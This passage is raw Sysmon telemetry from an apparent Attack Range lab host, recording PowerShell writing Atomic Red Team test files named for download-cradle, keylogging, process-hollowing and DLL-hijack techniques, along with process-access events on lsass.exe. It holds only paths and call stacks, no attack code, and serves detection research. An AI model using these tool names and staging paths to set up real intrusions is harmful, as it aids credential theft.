15:52:42.158{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1059.005\src\sys_info.vbs2020-11-03 15:52:42.158 11241100x80000000000000004006Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:42.126{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1059.001\src\test.ps12020-11-03 15:52:42.126 11241100x80000000000000004005Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:42.111{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1059.001\src\Invoke-DownloadCradle.ps12020-11-03 15:52:42.111 11241100x80000000000000004004Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:42.111{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1056.004\src\x64\T1056.004.dll2020-11-03 15:52:42.111 11241100x80000000000000004003Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:42.095{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1056.004\src\Win32\T1056.004.dll2020-11-03 15:52:42.095 11241100x80000000000000004002Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:42.095{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1056.004\src\T1056.004\T1056.004.vcxproj2020-11-03 15:52:42.095 11241100x80000000000000004001Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:42.095{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1056.004\src\T1056.004.sln2020-11-03 15:52:42.095 11241100x80000000000000004000Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:42.079{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1056.004\bin\T1056.004x86.dll2020-11-03 15:52:42.079 11241100x80000000000000003999Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:42.079{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1056.004\bin\T1056.004x64.dll2020-11-03 15:52:42.079 11241100x80000000000000003998Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:42.079{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1056.001\src\Get-Keystrokes.ps12020-11-03 15:52:42.079 11241100x80000000000000003997Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:42.064{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1055\src\x64\T1055.dll2020-11-03 15:52:42.064 11241100x80000000000000003996Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:42.064{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1055\src\Win32\T1055.dll2020-11-03 15:52:42.064 11241100x80000000000000003995Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:42.048{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1055.012\src\Start-Hollow.ps12020-11-03 15:52:42.048 11241100x80000000000000003994Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:42.032{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1055.004\src\x64\T1055.dll2020-11-03 15:52:42.032 11241100x80000000000000003993Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:42.032{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1055.004\src\Win32\T1055.dll2020-11-03 15:52:42.032 11241100x80000000000000003992Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localEXE2020-11-03 15:52:42.017{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1055.004\bin\T1055.exe2020-11-03 15:52:42.017 10341000x80000000000000004052Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:43.926{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004051Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:43.926{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004050Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:43.926{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004049Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:43.926{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004048Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:43.926{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004047Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:43.926{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000004046Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:43.065{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1574.012\src\x64\Release\atomicNotepad.dll2020-11-03 15:52:43.065 11241100x80000000000000004045Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:43.050{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1574.012\src\atomicNotepad\atomicNotepad.vcxproj2020-11-03 15:52:43.050 11241100x80000000000000004044Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:43.034{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1574.012\src\atomicNotepad.sln2020-11-03 15:52:43.034 11241100x80000000000000004043Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:43.034{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1574.012\bin\T1574.012x64.dll2020-11-03 15:52:43.034 11241100x80000000000000004042Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localEXE2020-11-03 15:52:43.018{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1574.009\bin\WindowsServiceExample.exe2020-11-03 15:52:43.018 11241100x80000000000000004041Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:43.003{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1574.002\bin\libcurl.dll2020-11-03 15:52:43.003 11241100x80000000000000004040Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localEXE2020-11-03 15:52:42.987{D28789B6-7CB1-5FA1-BD00-000000008801}4512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\atomic-red-team-local-master\atomics\T1574.002\bin\GUP.exe2020-11-03 15:52:42.987 10341000x80000000000000004140Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.521{D28789B6-7CCC-5FA1-C800-000000008801}31001104C:\Windows\system32\conhost.exe{D28789B6-7CCC-5FA1-CC00-000000008801}3576C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004139Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.521{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004138Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.521{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004137Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.521{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004136Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.521{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004135Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.521{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004134Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.521{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004133Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.521{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004132Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.521{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004131Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.521{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004130Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.521{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7CCC-5FA1-CC00-000000008801}3576C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004129Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.521{D28789B6-7CCC-5FA1-CB00-000000008801}35083444C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CCC-5FA1-CC00-000000008801}3576C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+316b32a9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b54133(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b53e04(